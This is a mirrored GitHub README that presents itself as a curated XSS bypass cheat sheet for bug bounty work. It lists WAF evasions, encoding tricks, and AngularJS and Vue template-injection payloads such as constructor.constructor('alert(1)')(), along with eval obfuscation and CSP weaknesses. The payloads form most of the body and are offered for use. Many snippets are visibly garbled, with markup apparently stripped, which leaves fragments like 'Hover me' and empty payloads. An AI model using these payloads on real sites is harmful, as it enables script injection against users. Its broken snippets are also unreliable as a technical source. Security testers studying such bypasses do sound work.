https://github.com/ero-hack/bypassxss

A curated collection of advanced XSS bypass techniques, including WAF evasions, framework-specific payloads, and real-world bug bounty cases.
https://github.com/ero-hack/bypassxss

bugbounty bypass dork erohack xss xss-attacks xss-bypass xss-dorks

Last synced: 2 months ago
JSON representation

A curated collection of advanced XSS bypass techniques, including WAF evasions, framework-specific payloads, and real-world bug bounty cases.

Host: GitHub
URL: https://github.com/ero-hack/bypassxss
Owner: ERO-HACK
Created: 2025-07-28T20:19:23.000Z (2 months ago)
Default Branch: main
Last Pushed: 2025-07-28T20:37:47.000Z (2 months ago)
Last Synced: 2025-07-28T22:21:48.285Z (2 months ago)
Topics: bugbounty, bypass, dork, erohack, xss, xss-attacks, xss-bypass, xss-dorks
Homepage: https://erohack.site
Size: 12.7 KB
Stars: 0
Watchers: 0
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

          # Advanced Cross-Site Scripting (XSS) Bypass Techniques

> **Mastering Filters, WAFs, and Real-World Exploitation**

---

## 📘 Introduction

Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous vulnerabilities in modern web applications. Despite improvements in input sanitization, CSP headers, and WAFs, attackers consistently find creative ways to bypass restrictions and execute scripts. This document presents a deep-dive into advanced XSS bypass techniques, grounded in real-world bug bounty cases and research.

---

## 🧭 Table of Contents

1. [Introduction](#-introduction)

2. [Types of XSS Filters](#-types-of-xss-filters)

3. [Encoding-Based Bypasses](#-encoding-based-bypasses)

4. [Event Handler & DOM Tricks](#-event-handler--dom-tricks)

5. [HTML5 Abuse & Weird Tags](#-html5-abuse--weird-tags)

6. [JavaScript Context Escapes](#-javascript-context-escapes)

7. [WAF Bypass Techniques](#-waf-bypass-techniques)

8. [Framework-Specific Payloads](#-framework-specific-payloads)

9. [CSP Misconfigurations](#-csp-misconfigurations)

10. [Advanced Obfuscation Techniques](#-advanced-obfuscation-techniques)

11. [Case Studies from Bug Bounties](#-case-studies-from-bug-bounties)

12. [Tools for Testing & Automation](#-tools-for-testing--automation)

13. [Payload Repository](#-payload-repository)

14. [Final Notes](#-final-notes)

15. [References](#-references)

---

## 🔐 Types of XSS Filters

* Input Filters (client-side / server-side)

* Output Filters (context-based)

* HTML Sanitizers (DOMPurify, xss-filters)

* WAFs (Cloudflare, Akamai, AWS WAF)

---

## 🧬 Encoding-Based Bypasses

```html

<script\x3Ealert(1)

```

---

## 🧠 Event Handler & DOM Tricks

```html

Hover me


Click me

```

---

## 🧪 HTML5 Abuse & Weird Tags

```html

alert(1)

```

---

## 🧩 JavaScript Context Escapes

```js

var data = "";

// Payload: ' onfocus=alert(1) autofocus='

JSON.parse('{"user":""}')

```

---

## 🧱 WAF Bypass Techniques

* Double Encoding:

```html

alert(1)

```

* Tag Confusion:

```html

<script>alert(1)

```

* Mixed Context Injection

* Non-Standard Quotes, Spaces, Comments

---

## ⚙️ Framework-Specific Payloads

### AngularJS

```html

{{constructor.constructor('alert(1)')()}}

```

### React

Escape JSX via `dangerouslySetInnerHTML`

### Vue.js

```html

{{['a'].pop().constructor('alert(1)')()}}

```

---

## 🛡️ CSP Misconfigurations

* Open `script-src` or `unsafe-inline`

* Trusted `data:` URIs

* Using `script` inside SVG or iframe

---

## 🌀 Advanced Obfuscation Techniques

```html

<!--alert(1)//-->

eval("al"+"ert(1)")

alert(1)]]>

```

---

## 🧾 Case Studies from Bug Bounties

✔️ **Case #17 (2024)**: Bypassed client-side regex using ``

✔️ **Private Program (2025)**: AngularJS sandbox escape using `{{constructor.constructor('alert(1)')()}}`

---

## 🧪 Tools for Testing & Automation

* [XSStrike](https://github.com/s0md3v/XSStrike)

* [Dalfox](https://github.com/hahwul/dalfox)

* [BugHunter](https://github.com/erohack/bughunter) *(by EroHack)*

* Custom Payload Generators

---

## 💣 Payload Repository

```

payloads/

├── waf-bypass.txt

├── dom-based.txt

├── unicode-encodings.txt

├── framework-specific/

│   ├── angular.txt

│   ├── react.txt

│   └── vue.txt

└── csp-bypass.txt

```

---

## 🧾 Final Notes

* Always test across browsers.

* CSP headers are not always reliable.

* Validate both reflection and execution.

* Automate with caution — manual inspection is key.

---

## 🔗 References

* [OWASP XSS Cheat Sheet](https://owasp.org/www-community/xss)

* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

* [PortSwigger XSS Bypasses](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)

* [HackerOne Writeups](https://hackerone.com/hacktivity)

---

**Author:** [Shayan from EroHack](https://github.com/ERO-HACK)

**Telegram:** [Join Telegram](https://t.me/erohack0)

**License:** MIT

**Last Update:** July 2025

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/ero-hack/bypassxss

Awesome Lists containing this project

README